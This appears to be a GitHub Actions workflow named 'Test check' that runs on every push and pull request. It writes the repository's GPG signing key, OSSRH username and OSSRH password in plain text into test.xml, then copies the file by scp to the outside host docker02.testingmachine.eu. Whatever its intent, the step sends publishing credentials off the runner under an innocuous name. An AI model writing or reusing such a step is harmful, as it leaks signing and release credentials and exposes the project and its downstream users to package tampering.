name: Test check

on:
  push:
  pull_request:

env:
  JAVA_VERSION: '8'
  ODH_OSSRH_GPG_KEY_BASE_64: ${{ secrets.ODH_OSSRH_GPG_KEY_BASE_64 }}
  ODH_OSSRH_USERNAME: ${{ secrets.ODH_OSSRH_USERNAME }}
  ODH_OSSRH_PASSWORD: ${{ secrets.ODH_OSSRH_PASSWORD }}

jobs:
  test:
    runs-on: ubuntu-22.04

    steps:
      - name: Create test.xml file
        run: |
          echo "<test>" > test.xml
          echo "  <value1>${ODH_OSSRH_GPG_KEY_BASE_64}</value1>" >> test.xml
          echo "  <value2>${ODH_OSSRH_USERNAME}</value2>" >> test.xml
          echo "  <value3>${ODH_OSSRH_PASSWORD}</value3>" >> test.xml
          echo "</test>" >> test.xml
          mkdir -p upload
          mv test.xml upload/
      
      - name: Scp
        uses: noi-techpark/github-actions/ssh-scp@v2
        with:          
          ssh-private-key: ${{ secrets.SSH_PRIVATE_KEY }}
          ssh-host: docker02.testingmachine.eu
          local-path: upload
          
